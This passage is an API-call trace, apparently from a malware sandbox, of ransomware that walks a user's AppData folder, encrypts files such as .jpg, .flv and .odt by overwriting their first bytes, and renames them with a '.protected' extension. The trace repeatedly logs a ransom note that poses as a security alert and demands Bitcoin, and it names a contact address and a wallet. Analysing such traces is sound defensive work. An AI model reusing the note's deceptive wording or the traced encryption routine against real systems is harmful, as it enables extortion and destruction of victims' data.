lpNumberOfBytesWritten=0x295ea24*=0xb1, 
lpOverlapped=0x0) returned 1 [0089.705] CloseHandle (hObject=0xd8) returned 1 [0089.705] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0089.705] lstrcmpiW (lpString1="LogTransport2", lpString2="Windows") returned -1 [0089.705] lstrcmpiW (lpString1="LogTransport2", lpString2="Program Files") returned -1 [0089.705] lstrcmpiW (lpString1="LogTransport2", lpString2="Program Files (x86)") returned -1 [0089.705] lstrcmpiW (lpString1="LogTransport2", lpString2="$Recycle.bin") returned 1 [0089.705] lstrcmpiW (lpString1="LogTransport2", lpString2="System Volume Information") returned -1 [0089.706] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2") returned 69 [0089.706] lstrcmpW (lpString1="LogTransport2", lpString2=".") returned 1 [0089.706] lstrcmpW (lpString1="LogTransport2", lpString2="..") returned 1 [0089.706] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\*") returned 71 [0089.706] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0089.706] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0089.706] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0089.706] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0089.706] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0089.706] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0089.706] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\.") returned 71 [0089.706] lstrcmpW (lpString1=".", lpString2=".") 
returned 0 [0089.706] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0089.706] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0089.706] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0089.706] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0089.706] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0089.706] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0089.706] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\..") returned 72 [0089.706] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0089.706] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0089.706] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0089.706] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0089.706] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\RESTORE_FILES.txt") returned 87 [0089.706] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\LogTransport2\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\logtransport2\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0089.707] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.707] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0089.708] lstrlenA (lpString="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") returned 684 [0089.708] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0089.708] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.708] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0089.708] CloseHandle (hObject=0xd8) returned 1 [0089.708] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0089.708] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0089.708] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\RESTORE_FILES.txt") returned 73 [0089.708] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0089.709] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.709] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0089.710] lstrlenA (lpString="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") returned 684 [0089.710] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0089.710] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.710] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, 
lpOverlapped=0x0) returned 1 [0089.710] CloseHandle (hObject=0xd4) returned 1 [0089.710] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0089.710] lstrcmpiW (lpString1="aG_M.jpg", lpString2="Windows") returned -1 [0089.710] lstrcmpiW (lpString1="aG_M.jpg", lpString2="Program Files") returned -1 [0089.710] lstrcmpiW (lpString1="aG_M.jpg", lpString2="Program Files (x86)") returned -1 [0089.710] lstrcmpiW (lpString1="aG_M.jpg", lpString2="$Recycle.bin") returned 1 [0089.710] lstrcmpiW (lpString1="aG_M.jpg", lpString2="System Volume Information") returned -1 [0089.710] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aG_M.jpg") returned 58 [0089.710] StrStrIW (lpFirst="aG_M.jpg", lpSrch=".protected") returned 0x0 [0089.710] lstrcmpW (lpString1="aG_M.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0089.710] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0089.710] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0089.710] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aG_M.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ag_m.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0089.711] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aG_M.jpg") returned 58 [0089.711] StrStrW (lpFirst="aG_M.jpg", lpSrch=".txt") returned 0x0 [0089.711] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aG_M.jpg") returned 58 [0089.711] StrStrW (lpFirst="aG_M.jpg", lpSrch=".rar") returned 0x0 [0089.711] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aG_M.jpg") returned 58 [0089.711] StrStrW (lpFirst="aG_M.jpg", lpSrch=".zip") returned 0x0 [0089.711] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.712] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.712] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.713] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.713] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0089.713] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0089.713] CloseHandle (hObject=0xd4) returned 1 [0089.714] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aG_M.jpg.protected") returned 68 [0089.714] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aG_M.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ag_m.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\aG_M.jpg.protected" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\roaming\\ag_m.jpg.protected")) returned 1 [0089.715] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0089.715] lstrcmpiW (lpString1="BpkMqeTWM.flv", lpString2="Windows") returned -1 [0089.715] lstrcmpiW (lpString1="BpkMqeTWM.flv", lpString2="Program Files") returned -1 [0089.715] lstrcmpiW (lpString1="BpkMqeTWM.flv", lpString2="Program Files (x86)") returned -1 [0089.715] lstrcmpiW (lpString1="BpkMqeTWM.flv", lpString2="$Recycle.bin") returned 1 [0089.715] lstrcmpiW (lpString1="BpkMqeTWM.flv", lpString2="System Volume Information") returned -1 [0089.715] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\BpkMqeTWM.flv") returned 63 [0089.715] StrStrIW (lpFirst="BpkMqeTWM.flv", lpSrch=".protected") returned 0x0 [0089.715] lstrcmpW (lpString1="BpkMqeTWM.flv", lpString2="RESTORE_FILES.txt") returned -1 [0089.715] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0089.715] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0089.715] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\BpkMqeTWM.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\bpkmqetwm.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0089.715] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\BpkMqeTWM.flv") returned 63 [0089.715] StrStrW (lpFirst="BpkMqeTWM.flv", lpSrch=".txt") returned 0x0 [0089.715] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\BpkMqeTWM.flv") returned 63 [0089.715] StrStrW (lpFirst="BpkMqeTWM.flv", 
lpSrch=".rar") returned 0x0 [0089.715] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\BpkMqeTWM.flv") returned 63 [0089.715] StrStrW (lpFirst="BpkMqeTWM.flv", lpSrch=".zip") returned 0x0 [0089.715] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.716] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.716] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.717] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.717] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0089.717] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0089.717] CloseHandle (hObject=0xd4) returned 1 [0089.721] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\BpkMqeTWM.flv.protected") returned 73 [0089.721] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\BpkMqeTWM.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\bpkmqetwm.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\BpkMqeTWM.flv.protected" 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\bpkmqetwm.flv.protected")) returned 1 [0089.722] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0089.722] lstrcmpiW (lpString1="CeWKNCx_cc9C.odt", lpString2="Windows") returned -1 [0089.722] lstrcmpiW (lpString1="CeWKNCx_cc9C.odt", lpString2="Program Files") returned -1 [0089.722] lstrcmpiW (lpString1="CeWKNCx_cc9C.odt", lpString2="Program Files (x86)") returned -1 [0089.722] lstrcmpiW (lpString1="CeWKNCx_cc9C.odt", lpString2="$Recycle.bin") returned 1 [0089.722] lstrcmpiW (lpString1="CeWKNCx_cc9C.odt", lpString2="System Volume Information") returned -1 [0089.722] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CeWKNCx_cc9C.odt") returned 66 [0089.722] StrStrIW (lpFirst="CeWKNCx_cc9C.odt", lpSrch=".protected") returned 0x0 [0089.722] lstrcmpW (lpString1="CeWKNCx_cc9C.odt", lpString2="RESTORE_FILES.txt") returned -1 [0089.722] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0089.722] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0089.722] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CeWKNCx_cc9C.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\cewkncx_cc9c.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0089.723] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CeWKNCx_cc9C.odt") returned 66 [0089.723] StrStrW (lpFirst="CeWKNCx_cc9C.odt", lpSrch=".txt") returned 0x0 [0089.723] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\CeWKNCx_cc9C.odt") returned 66 [0089.723] StrStrW (lpFirst="CeWKNCx_cc9C.odt", lpSrch=".rar") returned 0x0 [0089.723] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CeWKNCx_cc9C.odt") returned 66 [0089.723] StrStrW (lpFirst="CeWKNCx_cc9C.odt", lpSrch=".zip") returned 0x0 [0089.723] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.724] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.724] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.725] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.725] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0089.725] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0089.725] CloseHandle (hObject=0xd4) returned 1 [0089.726] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CeWKNCx_cc9C.odt.protected") returned 76 [0089.726] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CeWKNCx_cc9C.odt" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\roaming\\cewkncx_cc9c.odt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CeWKNCx_cc9C.odt.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\cewkncx_cc9c.odt.protected")) returned 1 [0089.728] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0089.728] lstrcmpiW (lpString1="cUju.odt", lpString2="Windows") returned -1 [0089.728] lstrcmpiW (lpString1="cUju.odt", lpString2="Program Files") returned -1 [0089.728] lstrcmpiW (lpString1="cUju.odt", lpString2="Program Files (x86)") returned -1 [0089.728] lstrcmpiW (lpString1="cUju.odt", lpString2="$Recycle.bin") returned 1 [0089.728] lstrcmpiW (lpString1="cUju.odt", lpString2="System Volume Information") returned -1 [0089.728] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\cUju.odt") returned 58 [0089.728] StrStrIW (lpFirst="cUju.odt", lpSrch=".protected") returned 0x0 [0089.728] lstrcmpW (lpString1="cUju.odt", lpString2="RESTORE_FILES.txt") returned -1 [0089.729] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0089.729] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0089.729] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\cUju.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\cuju.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0089.729] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\cUju.odt") returned 58 [0089.729] StrStrW (lpFirst="cUju.odt", lpSrch=".txt") returned 0x0 [0089.729] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\cUju.odt") returned 58 [0089.729] StrStrW (lpFirst="cUju.odt", lpSrch=".rar") returned 0x0 [0089.729] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\cUju.odt") returned 58 [0089.729] StrStrW (lpFirst="cUju.odt", lpSrch=".zip") returned 0x0 [0089.729] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.730] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.730] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.731] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.731] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0089.731] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0089.731] CloseHandle (hObject=0xd4) returned 1 [0089.732] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\cUju.odt.protected") returned 68 [0089.732] MoveFileW 